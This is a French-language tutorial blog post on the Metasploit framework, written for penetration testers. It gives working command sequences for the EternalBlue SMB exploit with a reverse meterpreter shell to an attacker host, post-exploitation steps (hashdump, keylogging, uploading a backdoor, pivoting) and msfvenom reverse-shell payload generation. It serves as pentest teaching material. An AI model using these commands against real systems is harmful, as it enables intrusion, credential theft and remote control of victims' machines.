Metasploit — Framework d'Exploitation
Guide d'utilisation du framework Metasploit : modules, exploits, payloads et post-exploitation.
9 février 2026CyberVault3 min de lecture
#metasploit#exploitation#pentest#red-team
Introduction
Metasploit est le framework d'exploitation le plus populaire en cybersécurité offensive. Il fournit un ensemble complet d'outils pour le test de pénétration, du scan initial à la post-exploitation.
Architecture de Metasploit
Le framework est organisé en modules :
| Type | Description |
|---|---|
| Exploits | Code d'exploitation de vulnérabilités |
| Payloads | Code exécuté après exploitation |
| Auxiliary | Modules de scan et fuzzing |
| Post | Modules de post-exploitation |
| Encoders | Obfuscation de payloads |
Commandes de Base
Démarrage et Navigation
msfconsole-basics.shbash
# Lancer Metasploit
msfconsole
# Mettre à jour la base de données
msfdb init
msfdb start
# Rechercher un exploit
search type:exploit name:smb
search cve:2017-0144
# Informations sur un module
info exploit/windows/smb/ms17_010_eternalblue
# Sélectionner un module
use exploit/windows/smb/ms17_010_eternalblueConfiguration d'un Exploit
exploit-config.shbash
# Voir les options requises
show options
# Configurer la cible
set RHOSTS 192.168.1.100
set RPORT 445
# Configurer le payload
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444
# Lancer l'exploit
exploit
# ou en arrière-plan
exploit -jMeterpreter — Post-Exploitation
Meterpreter est le payload le plus puissant de Metasploit. Il fournit un shell interactif avancé sur la machine compromise.
meterpreter-commands.shbash
# Informations système
sysinfo
getuid
getpid
# Navigation fichiers
ls
cd C:\\Users
download secret.txt
upload backdoor.exe
# Réseau
ipconfig
route
portfwd add -l 3389 -p 3389 -r 10.0.0.1
# Escalade de privilèges
getsystem
hashdump
# Capture d'écran et keylogger
screenshot
keyscan_start
keyscan_dumpGénération de Payloads avec msfvenom
msfvenom permet de générer des payloads standalone :
msfvenom.shbash
# Payload Windows (exe)
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f exe -o payload.exe
# Payload Linux (elf)
msfvenom -p linux/x64/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f elf -o payload.elf
# Payload Web (PHP)
msfvenom -p php/meterpreter/reverse_tcp \
LHOST=192.168.1.50 LPORT=4444 \
-f raw -o shell.php
# Lister les formats disponibles
msfvenom --list formats
# Lister les encoders
msfvenom --list encodersArchitecture d'attaque Metasploit
Live
[Attacker:4444] [Target:445]
│ │
│ ── Exploit (EternalBlue) ──────> │
│ │
│ <── Meterpreter Session ──────── │
│ │
│ [Post-Exploitation] │
│ - hashdump │
│ - pivot → [Internal:3389] │Résumé
Metasploit est un outil essentiel pour les tests de pénétration. Sa modularité et sa communauté active en font le framework de référence pour la cybersécurité offensive. À utiliser uniquement dans un cadre légal et autorisé.